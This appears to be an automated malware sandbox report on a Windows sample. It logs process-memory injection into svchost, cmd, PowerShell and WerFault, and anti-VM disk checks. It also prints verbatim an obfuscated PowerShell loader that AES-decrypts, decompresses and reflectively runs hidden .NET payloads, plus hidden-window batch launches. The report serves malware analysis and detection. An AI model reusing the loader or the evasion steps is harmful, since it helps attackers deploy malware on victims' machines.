Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D865090000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 199015D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 188D6710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 29F37400000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
